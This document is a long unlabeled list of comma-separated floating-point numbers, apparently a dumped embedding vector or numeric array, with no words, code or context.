-0.010363351553678513, 0.040292833000421524, -0.03446019068360329, -0.03520414978265762, -0.020220812410116196, 0.009507798589766026, 0.015355318784713745, -0.02047375775873661, -0.02270563505589962, 0.00391322560608387, -0.008949829265475273, -0.014350973069667816, -0.048416867852211, -0.01961076445877552, -0.015995122492313385, -0.01053446251899004, 0.037882402539253235, -0.013160638511180878, 0.012587790377438068, 0.0018803569255396724, 0.007647900842130184, 0.030338658019900322, 0.005594573449343443, 0.010928761214017868, 0.004062017425894737, 0.025220217183232307, 0.001958472654223442, -0.017899658530950546, 0.025651713833212852, -0.034281641244888306, 0.004288924857974052, 0.002535040955990553, -0.05332699790596962, 0.014596479944884777, -0.020280327647924423, 0.008384420536458492, 0.018003813922405243, 0.04234616085886955, 0.019804194569587708, -0.002994435839354992, -0.01019224151968956, -0.006989496760070324, 0.006398049183189869, -0.0024904035963118076, 0.016262948513031006, 0.01503541599959135, 0.0122158108279109, -0.004143852740526199, 0.036007627844810486, -0.01312344055622816, -0.030383294448256493, 0.005505298264324665, -0.01906023547053337, -0.0036175018176436424, -0.0288507379591465, -0.007871088571846485, -0.0016525194514542818, 0.005003125872462988, -0.004471194930374622, 0.009269732050597668, 0.015816573053598404, 0.0010620018001645803, 0.024104278534650803, -0.011538807302713394, 0.01444768812507391, 0.0012823997531086206, -0.007900847122073174, 0.0263063982129097, 0.0008146353648044169, 0.017051545903086662, 0.01205957867205143, -0.013592135161161423, 0.0020737864542752504, 0.006580319255590439, 0.00887543335556984, -0.005133318714797497, -0.06386145949363708, 0.0017882919637486339, -0.0290739256888628, -0.030829669907689095, -0.028374604880809784, -0.00006777003727620468, 0.01788477972149849, -0.02489287592470646, -0.019283423200249672, 0.014373292215168476, -0.013071363791823387, 0.021872401237487793, 0.01638198271393776, -0.006836985237896442, -0.006703072693198919, 0.015228845179080963, 0.02456553280353546, 0.016322465613484383, -0.03672182559967041, 0.004686943255364895, -0.03088918700814247, -0.019863711670041084, -0.0025629394222050905, 0.0012647307012230158, 0.011836390942335129, -0.057582445442676544, -0.018033571541309357, 0.029773248359560966, 0.028731705620884895, -0.022601481527090073, -0.005475539714097977, -0.030859429389238358, -0.022720513865351677, -0.015310680493712425, -0.010906442068517208, 0.004285205155611038, -0.03434115648269653, -0.030502328649163246, 0.0059963115490973, 0.02620224468410015, -0.0068258256651461124, -0.008488574996590614, 0.03663255274295807, -0.002495983149856329, -0.011709918268024921, -0.02894001454114914, -0.039340563118457794, -0.01019224151968956, 0.0040657371282577515, -0.04695870727300644, 0.007394954562187195, 0.006182301323860884, 0.046333782374858856, 0.03416260704398155, -0.01678371988236904, -0.022631239145994186, 0.020548153668642044, -0.014440248720347881, -0.007811571937054396, -0.02307761460542679, 0.003234362695366144, 0.0061041852459311485, 0.009388765320181847, -0.009775624610483646, -0.027779437601566315, -0.012773780152201653, 0.011434652842581272, 0.03172242268919945, 0.006130224093794823, -0.031514111906290054, -0.012386920861899853, 0.014135225676000118, -0.03416260704398155, -0.013540057465434074, 0.03630521148443222, 0.021559938788414, 0.006978337652981281, -0.019938107579946518, 0.010958519764244556, -0.004240567795932293, -0.03303179144859314, -0.0101699223741889, -0.029996436089277267, -0.021559938788414, -0.02147066406905651, -0.014477446675300598, -0.016411740332841873, -0.034103091806173325, 0.02097965031862259, -0.024148916825652122, 0.0012731002643704414, -0.0037662936374545097, 0.03511487692594528, 0.015444593504071236, 0.01642661914229393, -0.011509048752486706, -0.002821465255692601, 0.008867993950843811, 0.008131474256515503, -0.03490656614303589, 0.0016748382477089763, -0.03193072974681854, 0.00491385068744421, -0.016367102041840553, 0.0035598448012024164, 0.015199086628854275, 0.021039167419075966, 0.0018217700999230146, 0.0324961394071579, 0.0015864931046962738, -0.04163195937871933, -0.01837579347193241, 0.006948579102754593, -0.007908286526799202, -0.0075623453594744205, 0.009128379635512829, -0.030651120468974113, -0.024446500465273857, -0.02175336703658104, 0.023271044716238976, 0.014990778639912605, -0.014544403180480003, -0.0013716748217120767, 0.018762651830911636, 0.006762589327991009, 0.008682004176080227, -0.06073683127760887, 0.003403613343834877, -0.006989496760070324, -0.00402481947094202, -0.031008221209049225, -0.01810796745121479, -0.022036071866750717, -0.0238810908049345, 0.005148197989910841, 0.012223250232636929, 0.008934950456023216, -0.024833358824253082, -0.01399387326091528, 0.010690693743526936, 0.006472445093095303, -0.027511611580848694, -0.002179800532758236, -0.01638198271393776, -0.015280922874808311, 0.020905254408717155, 0.007752055302262306, 0.008711762726306915, -0.02179800532758236, -0.038507331162691116, 0.017453283071517944, 0.0032566816080361605, 0.0369301363825798, -0.02548804320394993, -0.0019696319941431284, -0.0052077146247029305, 0.021559938788414, 0.022556843236088753, 0.024461379274725914, -0.0016646087169647217, -0.009567315690219402, 0.00819099135696888, 0.02193191833794117, 0.004936169367283583, 0.018405551090836525, 0.0027954268734902143, 0.002862383145838976, -0.02456553280353546, -0.012438998557627201, 0.010244318284094334, -0.012520833872258663, 0.0006565439980477095, 0.00803475920110941, 0.03472801670432091, 0.013316869735717773, -0.04314963519573212, -0.018420429900288582, -0.02803238295018673, 0.007789253257215023, 0.013837642036378384, 0.02461017109453678, 0.006197180133312941, -0.01410546712577343, 0.0277496799826622, -0.009195336140692234, 0.06064755469560623, -0.015355318784713745, -0.013435903936624527, -0.0004561399982776493, -0.003232502844184637, -0.015905847772955894, -0.0007235003286041319, 0.0010833906708285213, 0.0012796098599210382, -0.012543152086436749, 0.018807290121912956, -0.05192835256457329, -0.02020593173801899, -0.029148321598768234, 0.012037260457873344, -0.00007044363883323967, 0.002187240170314908, 0.011598324403166771, 0.012982088141143322, 0.009835140779614449, -0.024223312735557556, -0.00729080056771636, 0.01934294030070305, -0.03389478102326393, 0.0016515895258635283, -0.02106892503798008, 0.007599543314427137, -0.01865849830210209, -0.009678909555077553, -0.031514111906290054, -0.0015130271203815937, 0.029550060629844666, -0.040233314037323, 0.019804194569587708, 0.02456553280353546, -0.02966909483075142, 0.018584100529551506, -0.009559876285493374, -0.01934294030070305, -0.022422930225729942, 0.0058921570889651775, -0.006684473715722561, -0.04457803815603256, -0.005371385719627142, 0.009321808815002441, 0.07838354259729385, 0.009336688555777073, 0.008376981131732464, -0.018137725070118904, 0.0009727266733534634, 0.01092132180929184, 0.002453205641359091, 0.015191647224128246, 0.00048450345639139414, 0.006889062467962503, 0.03499584272503853, 0.0003896486305166036, 0.008882872760295868, -0.008198430761694908, 0.010631177574396133, 0.005951673723757267, -0.015065174549818039, -0.026142727583646774, 0.012565471231937408, 0.01847994700074196, 0.013227595016360283, -0.00921765435487032, 0.009589634835720062, 0.013331749476492405, 0.010527023114264011, -0.027407458052039146, 0.0073093995451927185, -0.03053208626806736, -0.016709323972463608, -0.014187302440404892, 0.0009717967477627099, -0.008131474256515503, -0.009678909555077553, 0.005955393426120281, 0.016352223232388496, 0.009031664580106735, 0.010564221069216728, -0.02693132311105728, -0.016486136242747307, -0.011538807302713394, -0.009775624610483646, 0.004523272160440683, -0.01965540274977684, 0.0027080115396529436, 0.0013912037247791886, -0.02524997666478157, 0.04419117793440819, 0.016277827322483063, -0.018033571541309357, 0.0016748382477089763, -0.0076776593923568726, -0.0071940855123102665, 0.026589103043079376, 0.01998274400830269, -0.01076508965343237, 0.025279734283685684, -0.000884381530340761, 0.0026298959273844957, -0.031008221209049225, -0.006520802620798349, -0.0026205964386463165, 0.016143914312124252, 0.006978337652981281, 0.01044518779963255, 0.003217623569071293, -0.01742352545261383, -0.01664980687201023, 0.006636116188019514, -0.006238098256289959, 0.022556843236088753, 0.011985182762145996, -0.008793598040938377, 0.006900222040712833, 0.005884717684239149, 0.001388413948006928, 0.022333655506372452, -0.007320558652281761, 0.009039104916155338, -0.03434115648269653, -0.011933105997741222, 0.03326985612511635, 0.024461379274725914, -0.016084399074316025, 0.009567315690219402, -0.016054639592766762, 0.0296244565397501, -0.003100450150668621, 0.0145369628444314, 0.00853321235626936, 0.006513363216072321, -0.0060632675886154175, -0.002672673435881734, 0.014968459494411945, 0.024000125005841255, 0.0018561782781034708, 0.013755805790424347, 0.011166827753186226, -0.0213367510586977, -0.00926229264587164, -0.012000062502920628, 0.02239317260682583, -0.0010368932271376252, 0.03609690070152283, 0.0015837032115086913, -0.015533868223428726, 0.005241192877292633, -0.02394060790538788, 0.014953580684959888, 0.008324903436005116, -0.011642961762845516, -0.0167985986918211, -0.027452096343040466, 0.012736582197248936, -0.008562970906496048, 0.014477446675300598, 0.017408646643161774, -0.009902097284793854, -0.005981432273983955, -0.00958219449967146, -0.024000125005841255, -0.022512206807732582, -0.004121534060686827, 0.03654327616095543, -0.022675877436995506, -0.012587790377438068, 0.000004842273483518511, 0.006238098256289959, -0.018822168931365013, 0.03071063756942749, 0.027452096343040466, 0.004240567795932293, 0.017393765971064568, -0.005907036364078522, 0.0017864321125671268, -0.00012240454088896513, -0.02334544062614441, 0.012595229782164097, -0.0028344846796244383, -0.006513363216072321, 0.0022951140999794006, 0.010043449699878693, 0.032287828624248505, 0.02770504169166088, 0.026514707133173943, -0.004028539173305035, -0.007242443040013313, 0.00969378836452961, 0.007699978072196245, 0.011523928493261337, 0.010854365304112434, 0.000511936959810555, -0.012952330522239208, 0.015980243682861328, 0.01865849830210209, 0.010177361778914928, 0.01879240944981575, 0.018048450350761414, -0.014737832359969616, 0.013711168430745602, 0.007495389319956303, -0.013934356160461903, 0.016367102041840553, 0.009902097284793854, -0.0057470849715173244, 0.005605732556432486, 0.022318776696920395, -0.02416379563510418, -0.0479704923927784, 0.0019845112692564726, -0.03443043306469917, -0.0017873620381578803, 0.012096776627004147, -0.016173673793673515, -0.009820261970162392, 0.020756462588906288, 0.013800444081425667, -0.01843530870974064, 0.008867993950843811, 0.02493751235306263, -0.019908348098397255, 0.006520802620798349, 0.023806694895029068, 0.008853115141391754, 0.009106060490012169, 0.01775086671113968, -0.00273033045232296, 0.015087492763996124, 0.004080616403371096, -0.04216760769486427, 0.036692067980766296, 0.02957981824874878, 0.05088680982589722, -0.03362695872783661, 0.009649151004850864, -0.028463879600167274, -0.02865730971097946, -0.01089900266379118, 0.0012786799343302846, -0.012200931087136269, 0.020191052928566933, 0.00556109519675374, -0.007513988297432661, -0.013495420105755329, -0.0036602793261408806, -0.009656590409576893, -0.015050294809043407, 0.022140227258205414, 0.01833115518093109, 0.007945484481751919, 0.001631130580790341, -0.010519583709537983, 0.018673377111554146, 0.027898471802473068, -0.021738488227128983, 0.0021184238139539957, -0.004385639447718859, 0.012505954131484032, -0.025279734283685684, 0.002040308201685548, 0.03335913270711899, -0.02611296810209751, 0.04755387455224991, 0.011412334628403187, 0.001022013952024281, -0.006543121300637722, -0.012580350041389465, 0.03752530366182327, -0.03389478102326393, 0.010102965869009495, 0.0005654090200550854, 0.00006108602974563837, 0.019268544390797615, 0.006636116188019514, 0.0016729782801121473, -0.013264792971313, -0.01101059652864933, 0.004817136097699404, 0.0006858374108560383, -0.009887218475341797, -0.002373229945078492, -0.011657841503620148, -0.007394954562187195, -0.024580413475632668, -0.010266637429594994, -0.014462566934525967, -0.000185641081770882, 0.009768184274435043, 0.024312587454915047, -0.010214559733867645, 0.01847994700074196, -0.022467568516731262, 0.01711106300354004, -0.00426660617813468, -0.0075846645049750805, 0.0015781235415488482, 0.014135225676000118, 0.009797942824661732, -0.005393704399466515, 0.008376981131732464, 0.0032511018216609955, 0.004240567795932293, -0.010809727944433689, -0.002726610517129302, 0.02516070008277893, -0.03365671634674072, 0.009835140779614449, -0.00012321824033278972, -0.004865493159741163, 0.012438998557627201, 0.018256759271025658, 0.01383020170032978, 0.002717311028391123, 0.022913943976163864, 0.004977087024599314, -0.024773841723799706, 0.00010717662371462211, 0.00982770137488842, -0.029639335349202156, -0.005773123819380999, 0.0010322434827685356, -0.013532618060708046, 0.03687061741948128, 0.0015130271203815937, -0.0032827199902385473, 0.0051444778218865395, -0.013473101891577244, -0.016679566353559494, -0.0061562624759972095, -0.02352399006485939, -0.00763302156701684, -0.009076302871108055, 0.008674564771354198, -0.025696352124214172, -0.01693251170217991, 0.034608982503414154, -0.02016129530966282, -0.0050142849795520306, 0.04154268279671669, -0.005613172426819801, 0.024223312735557556, 0.0138748399913311, 0.014589040540158749, 0.004184770863503218, 0.02639567293226719, -0.006740270648151636, -0.003987621515989304, -0.00780413206666708, 0.014135225676000118, 0.010199680924415588, -0.012349722906947136, 0.0012982088373973966, -0.016039760783314705, -0.006029789336025715, -0.03231758996844292, 0.013502859510481358, 0.00814635306596756, 0.012572910636663437, 0.01435841340571642, -0.006509643048048019, 0.009515238925814629, 0.013212716206908226, -0.03443043306469917, -0.0072164046578109264, -0.016322465613484383, -0.0056168921291828156, 0.004679503384977579, -0.009083742275834084, 0.0020626268815249205, 0.010222000069916248, -0.02648494765162468, 0.016129035502672195, 0.012386920861899853, 0.04213785007596016, -0.006617517210543156, 0.021039167419075966, -0.0030372135806828737, 0.0018143305787816644, -0.002683833008632064, -0.013599574565887451, -0.007060172967612743, -0.017081303521990776, 0.033775750547647476, -0.015727298334240913, -0.005951673723757267, 0.009433402679860592, 0.006933699827641249, -0.0064315274357795715, 0.008615047670900822, 0.01620343141257763, -0.02739257924258709, -0.02115819975733757, -0.02016129530966282, -0.02020593173801899, 0.014975898899137974, 0.011070113629102707, -0.002685692859813571, 0.016129035502672195, 0.015027976594865322, 0.009887218475341797, -0.01751280017197132, -0.013383826240897179, 0.014879184775054455, -0.0003833714872598648, -0.017349129542708397, 0.00592563534155488, 0.00921765435487032, -0.005739645566791296, 0.013235034421086311, 0.01633734442293644, -0.03389478102326393, -0.017810383811593056, 0.006844424642622471, 0.006680754013359547, 0.007119689602404833, -0.012930011376738548, 0.01870313473045826, 0.01788477972149849, 0.004021099768579006, -0.015117251314222813, 0.028746584430336952, 0.011367697268724442, 0.01706642471253872, 0.00286610284820199, 0.03163314610719681, -0.05314844846725464, 0.0014944281429052353, -0.0072461627423763275, 0.01669444516301155, -0.003983901813626289, -0.022214623168110847, 0.005702447611838579, 0.018628738820552826, 0.0029665373731404543, 0.029282234609127045, 0.005122159142047167, 0.006658434867858887, 0.0020607670303434134, 0.0005756384343840182, -0.01920902729034424, 0.008339783176779747, 0.010995717719197273, 0.005475539714097977, -0.003688177792355418, 0.010021130554378033, -0.002442046068608761, -0.00036756234476342797, 0.009745866060256958, -0.0318414531648159, 0.025354130193591118, -0.0008104505832307041, 0.002040308201685548, -0.02001250348985195, -0.001563244266435504, -0.027779437601566315, -0.02224438078701496, 0.008763839490711689, -0.0016999468207359314, -0.002185380319133401, 0.0020737864542752504, -0.010214559733867645, 0.02151530049741268, 0.01565290242433548, -0.014879184775054455, -0.022780030965805054, 0.0016357803251594305, -0.005918195471167564, -0.00454931054264307, -0.0036993371322751045, 0.018956081941723824, -0.005854959134012461, 0.006903941743075848, 0.013361508026719093, 0.04213785007596016, 0.015533868223428726, 0.01087668351829052, -0.014663436450064182, -0.0024308867286890745, 0.015042855404317379, -0.005274671129882336, 0.008138913661241531, 0.015593385323882103, -0.008719202131032944, 0.002456925343722105, -0.0038871869910508394, -0.012245568446815014, -0.016456378623843193, -0.014663436450064182, -0.022050950676202774, -0.012684504501521587, -0.001504657557234168, 0.028746584430336952, 0.004240567795932293, 0.01028151623904705, 0.016917632892727852, 0.017036667093634605, -0.0143137751147151, -0.000548669951967895, -0.010593979619443417, 0.008748960681259632, 0.0006435247487388551, 0.01092132180929184, -0.008920070715248585, 0.03794192150235176, -0.007528867572546005, -0.0020179892890155315, 0.006721671670675278, 0.028002625331282616, 0.011003157123923302, 0.000998765230178833, -0.014641117304563522, 0.03398405760526657, -0.010720452293753624, 0.012744021601974964, -0.004236847627907991, -0.020101778209209442, -0.016218310222029686, -0.018673377111554146, -0.018628738820552826, 0.0019231345504522324, 0.00420708954334259, 0.004575349390506744, 0.00948548037558794, -0.0038574286736547947, 0.0058103217743337154, -0.00004042372165713459, 0.016129035502672195, -0.0022021192125976086, 0.01313087996095419, 0.014841986820101738, 0.0022839547600597143, 0.003762573702260852, 0.019313180819153786, -0.01596536487340927, 0.0033385169226676226, 0.025101184844970703, 0.01810796745121479, 0.006907661445438862, 0.019685160368680954, 0.014611358754336834, -0.008183551020920277, 0.003965302836149931, -0.004274045582860708, 0.0019714918453246355, -0.013778124935925007, 0.021545059978961945, -0.012468756176531315, 0.001993810757994652, 0.007484229747205973, 0.012453877367079258, -0.027035478502511978, -0.0037551342975348234, -0.009076302871108055, 0.010794848203659058, 0.009730986319482327, -0.009872338734567165, -0.006409208755940199, -0.001227532746270299, -0.0016469397814944386, -0.017140820622444153, 0.006870463490486145, 0.008808476850390434, -0.002220718190073967, -0.007063892669975758, -0.024744084104895592, -0.0232115276157856, 0.006386890076100826, -0.006479884963482618, 0.009656590409576893, 0.005241192877292633, 0.00460882717743516, 0.000769997772295028, -0.008734080940485, -0.012297646142542362, -0.016501015052199364, -0.012290206737816334, -0.01574217714369297, 0.016843236982822418, -0.022958582267165184, 0.0015604544896632433, -0.003308758605271578, 0.003091150661930442, 0.0055648148991167545, -0.007577224634587765, 0.017483042553067207, 0.0060744271613657475, -0.015236284583806992, -0.01053446251899004, -0.007104810792952776, -0.008429057896137238, 0.016843236982822418, -0.016277827322483063, -0.008927511051297188, -0.02120283804833889, -0.009158138185739517, -0.009254852309823036, 0.022169984877109528, -0.0047204215079545975, 0.0045530302450060844, -0.007967803627252579, 0.01660517044365406, -0.002127723302692175, -0.015861211344599724, 0.025130942463874817, 0.015682660043239594, 0.004069456830620766, 0.016054639592766762, -0.0053007095120847225, 0.006822105962783098, 0.006059547886252403, -0.01609927788376808, 0.004865493159741163, 0.02188728004693985, 0.004936169367283583, 0.006740270648151636, -0.014388171024620533, 0.0029330593533813953, -0.0032418023329228163, -0.0021686411928385496, 0.016054639592766762, 0.00427776575088501, 0.013733487576246262, 0.010021130554378033, -0.027466975152492523, -0.0011819652281701565, 0.0017417945200577378, -0.014499764889478683, 0.0060744271613657475, -0.025398768484592438, -0.027511611580848694, -0.004121534060686827, -0.0024662248324602842, 0.02524997666478157, -0.024744084104895592, -0.015638023614883423, -0.016322465613484383, -0.013934356160461903, -0.019804194569587708, -0.007685098797082901, -0.017542557790875435, 0.013160638511180878, 0.00015239539789035916, 0.025919539853930473, -0.018628738820552826, -0.0015093073016032577, -0.024372104555368423, 0.008406739681959152, 0.03704917058348656, -0.0014460707316175103, -0.01775086671113968, -0.014938700944185257, -0.005468100309371948, -0.011390015482902527, 0.004080616403371096, 0.001888726488687098, -0.011695039458572865, -0.003178565762937069, 0.0007509338320232928, -0.0035672844387590885, -0.00554993562400341, -0.02911856397986412, 0.0027563688345253468, 0.012000062502920628, 0.004917570389807224, 0.009336688555777073, 0.006799787282943726, -0.002404848113656044, -0.00816867221146822, -0.0011140789138153195, 0.010184802114963531, 0.011174267157912254, 0.010274076834321022, 0.00349846831522882, 0.00745075149461627, 0.012431558221578598, -0.0017408645944669843, -0.0011763855582103133, -0.0052486322820186615, -0.00010822281910805032, -0.001954752951860428, 0.007361476309597492, -0.014365852810442448, 0.00036291260039433837, 0.009254852309823036, 0.01303416583687067, -0.025770748034119606, 0.0025294614024460316, 0.00273033045232296, -0.010296395979821682, 0.02770504169166088, 0.02434234507381916, 0.0008801967487670481, 0.012572910636663437, -0.0035207869950681925, 0.006264136638492346, 0.014001312665641308, -0.021545059978961945, -0.022214623168110847, -0.015444593504071236, -0.011553687043488026, -0.002869822783395648, 0.012200931087136269, 0.019223906099796295, -0.0068109468556940556, 0.016233190894126892, -0.0022802350576967, -0.00937388651072979, 0.00034919584868475795, -0.0012461317237466574, 0.01861386001110077, 0.01435841340571642, 0.0014051529578864574, 0.011724797077476978, -0.0064315274357795715, -0.013532618060708046, -0.014916382730007172, -0.015310680493712425, 0.00862248707562685, -0.0019435934955254197, -0.007893407717347145, 0.002918180078268051, -0.010705573484301567, -0.005486699286848307, 0.0005793582531623542, -0.0031506672967225313, -0.003275280585512519, -0.009448282420635223, -0.0022076989989727736, -0.008994466625154018, -0.010861804708838463, -0.008101715706288815, 0.01711106300354004, -0.009678909555077553, 0.013346628285944462, 0.01278865896165371, 0.007164327427744865, -0.05651114135980606, 0.0016766980988904834, 0.005661529488861561, -0.009664030745625496, -0.003362695686519146, -0.004370760638266802, -0.001504657557234168, -0.009544996544718742, 0.021440904587507248, -0.011084992438554764, 0.030338658019900322, -0.00673283077776432, 0.009492919780313969, 0.00337757496163249, -0.003176705911755562, 0.023285923525691032, -0.018584100529551506, 0.011925666593015194, -0.011568565852940083, -0.025324372574687004, 0.0008806617115624249, 0.012401800602674484, -0.018271638080477715, 0.03199024498462677, -0.00875640008598566, -0.012818417511880398, 0.010341033339500427, -0.0007397744338959455, -0.03163314610719681, 0.0032473821192979813, 0.000042457984818611294, -0.00763302156701684, -0.0033757148776203394, -0.006967178080230951, 0.005081241484731436, 0.025413647294044495, -0.004965927917510271, 0.020667187869548798, -0.01505773514509201, -0.00002454193599987775, 0.003636100795120001, -0.0006914170808158815, -0.031960487365722656, -0.012751461006700993, 0.0036435401998460293, 0.0422271266579628, 0.00657287985086441, -0.012364602647721767, 0.009969053789973259, -0.0012154433643445373, 0.017780626192688942, -0.011293301358819008, 0.01376324612647295, -0.023806694895029068, 0.011583445593714714, -0.021262355148792267, 0.0005389054422266781, -0.032109279185533524, -0.01314575970172882, 0.002821465255692601, -0.013212716206908226, -0.011501609347760677, -0.0057470849715173244, -0.009954174049198627, -0.0182418804615736, -0.007142008747905493, 0.010951079428195953, 0.033507924526929855, 0.0288507379591465, 0.014894063584506512, 0.01837579347193241, -0.02361326664686203, -0.0052077146247029305, -0.009403645060956478, -0.00546066090464592, -0.007759494706988335, 0.026648620143532753, 0.024773841723799706, -0.0074619110673666, 0.0009448282071389258, -0.0008662475156597793, 0.008927511051297188, -0.01978931576013565, -0.0018292097374796867, 0.007878527976572514, 0.021812884137034416, -0.012014941312372684, 0.004110374487936497, 0.006818386260420084, 0.027243787422776222, -0.007313119247555733, 0.0064836046658456326, 0.012863054871559143, 0.014098027721047401, -0.017274733632802963, 0.006558000575751066, 0.012572910636663437, -0.013845081441104412, -0.0018524584593251348, -0.012617548927664757, -0.019819073379039764, -0.01517676841467619, 0.00562061183154583, 0.0006235308246687055, -0.006691913120448589, 0.008176111616194248, -0.002947938395664096, 0.0030130348168313503, 0.0134879807010293, 0.01720033772289753, 0.008763839490711689, 0.0085108932107687, 0.034549467265605927, 0.013383826240897179, 0.021262355148792267, -0.022452689707279205, 0.014804788865149021, -0.019461972638964653, 0.00021121467580087483, 0.00461998675018549, 0.012944890186190605, -0.016590291634202003, 0.0028902816120535135, 0.034192364662885666, 0.0023936887737363577, -0.0035635647363960743, -0.00923253409564495, -0.002416007686406374, -0.016396861523389816, 0.0064426870085299015, 0.00033361921668983996, 0.012074458412826061, -0.018122846260666847, 0.003455690573900938, -0.007063892669975758, -0.0004924079985357821, 0.0012693804455921054, 0.0010424728970974684, -0.011390015482902527, -0.009812822565436363, 0.01351029984652996, -0.006148823071271181, -0.020622549578547478, -0.016143914312124252, 0.034549467265605927, -0.0014730392722412944, -0.0013623753329738975, 0.030502328649163246, 0.012074458412826061, 0.007885967381298542, -0.0026057171635329723, 0.004359601065516472, -0.011077553033828735, 0.003991341218352318, -0.005854959134012461, 0.00023609081108588725, -0.005099840462207794, -0.003096730215474963, 0.00909862108528614, 0.019030477851629257, 0.004500953480601311, 0.011642961762845516, -0.022467568516731262, -0.00230441358871758, 0.010467506013810635, 0.018167484551668167, -0.001885006669908762, 0.02379181608557701, -0.01109987124800682, 0.016218310222029686, -0.0041066547855734825, -0.001665538758970797, -0.0004696242685895413, -0.005542496219277382, -0.014782469719648361, -0.006587759125977755, 0.0018199102487415075, -0.000040365601307712495, 0.009165577590465546, -0.014655997045338154, -0.008466255851089954, -0.004653465002775192, -0.015199086628854275, -0.03877515345811844, 0.009991372004151344, 0.017408646643161774, 0.014298896305263042, -0.015548747964203358, -0.012416679412126541, 0.0025536399334669113, -0.012476196512579918, 0.01360701397061348, 0.015489230863749981, -0.013859960250556469, -0.011747116222977638, -0.00657287985086441, 0.018718013539910316, -0.014566721394658089, 0.03776337206363678, 0.03681110218167305, -0.010222000069916248, 0.0018078208668157458, -0.0006765379221178591, 0.004590228199958801, 0.006524522323161364, -0.008689443580806255, -0.011092431843280792, 0.004958488047122955, 0.02356862835586071, -0.00004428882311913185, 0.01301184669137001, -0.0029460785444825888, 0.0028010064270347357, -0.003909505903720856, 0.020949892699718475, -0.0016292707296088338, -0.004188490565866232, 0.0007899916963651776, -0.009455721825361252, 0.012714263051748276, 0.00407317653298378, -0.012148854322731495, -0.014239379204809666, -0.011308180168271065, 0.009641711600124836, 0.016575410962104797, 0.0004312638775445521, -0.0040657371282577515, 0.004088055808097124, 0.010474946349859238, 0.0031078895553946495, 0.01620343141257763, -0.017721109092235565, -0.004768778569996357, -0.020265448838472366, 0.0011708058882504702, 0.01064605638384819, 0.006193460430949926, 0.021619455888867378, -0.025636835023760796, 0.01574217714369297, 0.0020179892890155315, -0.02374717779457569, 0.005103560164570808, -0.0016106717521324754, 0.003809071145951748, -0.00898702722042799, 0.0027879872359335423, -0.010839485563337803, -0.019729798659682274, -0.02219974249601364, 0.007766934111714363, 0.014492325484752655, 0.021678971126675606, -0.0020254289265722036, 0.001479548867791891, -0.007863649167120457, -0.015816573053598404, -0.016352223232388496, -0.017125941812992096, -0.008243068121373653, -0.020101778209209442, 0.008845674805343151, 0.02780919522047043, -0.014752711169421673, -0.030561845749616623, -0.02411915734410286, -0.0011680159950628877, 0.0023453314788639545, -0.004675783682614565, -0.003916945308446884, -0.02292882278561592, -0.03859660401940346, -0.0007104810792952776, -0.004047138150781393, -0.0047092619352042675, -0.021351629868149757, 0.031157013028860092, -0.022080710157752037, 0.012654746882617474, 0.018033571541309357, -0.014655997045338154, -0.008726641535758972, 0.008071957156062126, 0.0011652261018753052, -0.0072982399724423885, -0.0021630614064633846, -0.013197836466133595, -0.029520301148295403, 0.011084992438554764, -0.010727891698479652, -0.015213966369628906, -0.01503541599959135, 0.010861804708838463, -0.006851864513009787, -0.008198430761694908, -0.019283423200249672, 0.017006907612085342, 0.0013623753329738975, 0.01833115518093109, 0.007435872685164213, 0.005921915639191866, 0.000537045591045171, 0.004753899294883013, -0.011159388348460197, -0.013592135161161423, -0.010333593934774399, -0.007439592387527227, 0.022690756246447563, 0.007037854287773371, -0.015206526964902878, -0.011702478863298893, 0.032972272485494614, 0.003515207441523671, 0.006729111075401306, 0.012967209331691265, 0.031276047229766846, -0.00408433610573411, -0.0004419582837726921, -0.0007044363883323967, 0.006558000575751066, -0.007580944336950779, 0.011345378123223782, 0.012476196512579918, -0.008466255851089954, 0.00959707424044609, 0.009254852309823036, 0.010541901923716068, -0.027243787422776222, -0.031960487365722656, -0.026098089292645454, -0.020191052928566933, -0.007346597500145435, 0.02087549678981304, -0.0015892828814685345, 0.014864305034279823, 0.01075765024870634, 0.0051965550519526005, 0.004318683408200741, 0.02211046777665615, 0.033418647944927216, -0.002172360895201564, 0.02179800532758236, 0.004184770863503218, -0.004783657845109701, -0.0000501300637552049, -0.02279490977525711, -0.0031525271479040384, 0.006435247138142586, -0.02615760639309883, -0.005557375494390726, -0.009061423130333424, -0.007729736156761646, 0.005869838409125805, 0.004140133038163185, -0.010162482969462872, 0.011866149492561817, -0.009083742275834084, -0.025458285585045815, -0.018822168931365013, -0.017572317272424698, 0.02615760639309883, 0.026529585942626, -0.0005244912463240325, 0.003091150661930442, -0.0036100621800869703, -0.011665280908346176, 0.0021667813416570425, -0.001681347843259573, 0.02993691898882389, 0.004735300317406654, -0.038477569818496704, 0.010207120329141617, -0.01720033772289753, 0.029178081080317497, 0.0052597918547689915, 0.0028475038707256317, -0.015429714694619179, 0.010199680924415588, -0.01764671318233013, -0.003686317941173911, -0.0004573024343699217, -0.0049845268949866295, 0.025726109743118286, 0.01952148973941803, -0.004214528948068619, 0.010251757688820362, 0.028493639081716537, -0.0058400798588991165, 0.01408314798027277, -0.0011642961762845516, 0.008845674805343151, -0.005962833296507597, 0.006799787282943726, 0.006650995463132858, -0.008429057896137238, 0.00209796498529613, -0.011337938718497753, -0.012319964356720448, -0.011300740763545036, 0.003861148376017809, -0.007465630769729614, 0.008629927411675453, 0.005296989809721708, -0.025547560304403305, -0.008548091165721416, -0.0021909598726779222, 0.006435247138142586, 0.003777452977374196, 0.0015948625514283776, 0.012379481457173824, 0.00021691061556339264, 0.013346628285944462, 0.005371385719627142, -0.006677033845335245, 0.003762573702260852, -0.002378809731453657, 0.010073208250105381, -0.00236579030752182, 0.00527839083224535, -0.01629270613193512, -0.014775030314922333, -0.01578681543469429, 0.00900934636592865, -0.008228189311921597, -0.002821465255692601, -0.006881623063236475, 0.024699445813894272, -0.011494169943034649, 0.00543834175914526, -0.013592135161161423, -0.015117251314222813, 0.004988246597349644, 0.009143258444964886, -0.03493632376194, -0.00010560733790043741, -0.034787531942129135, -0.0077446154318749905, 0.033924542367458344, 0.018137725070118904, -0.012275326997041702, 0.005081241484731436, -0.01173967681825161, -0.011724797077476978, 0.009150698781013489, 0.0067588696256279945, -0.001113148988224566, 0.0015753336483612657, -0.019952986389398575, -0.0277496799826622, -0.004385639447718859, -0.0024383263662457466, -0.023776937276124954, 0.013733487576246262, 0.003783032763749361, -0.04353649541735649, 0.004489793907850981, 0.009068862535059452, 0.0018738473299890757, 0.0015911428490653634, 0.00937388651072979, -0.02325616590678692, -0.003094870364293456, 0.007372635882347822, -0.012148854322731495, 0.009954174049198627, -0.0008192851091735065, 0.011583445593714714, 0.015027976594865322, -0.0034445312339812517, -0.0030297739431262016, -0.008503453806042671, 0.015370197594165802, -0.019640523940324783, -0.000013883848623663653, 